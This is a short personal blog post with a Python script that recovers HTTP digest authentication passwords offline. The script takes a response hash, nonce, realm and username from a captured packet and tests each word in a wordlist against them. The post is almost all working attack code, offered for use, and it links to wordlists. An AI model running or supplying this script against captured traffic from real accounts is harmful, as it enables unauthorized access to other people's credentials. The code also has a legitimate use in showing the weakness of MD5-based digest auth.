/ #snippet #security 

HTTP Authentication Dictionary Attack

Here’s a little snippet of Python code to crack HTTP digest authentication, getting a user’s password given information from a captured packet and a wordlist.

import hashlib

extracted = 'known_auth_hash'
nonce = 'known_nonce_hash'

user = 'known_username'
realm = 'known_realm'
uri = '/image.png'
method = 'GET'

with open('words.txt', 'r') as file:
  for line in file:
    line = line.strip()

    ha1 = hashlib.md5((user+':'+realm+':'+line).encode('utf-8')).hexdigest()
    ha2 = hashlib.md5((method+':'+uri).encode('utf-8')).hexdigest()
    response = hashlib.md5((ha1+':'+nonce+':'+ha2).encode('utf-8')).hexdigest()

    if response == extracted:
      print('success! word was:', line)

You can find some good wordlists right here.


Matt Crook

Futurist, technologist, and student at Auckland Uni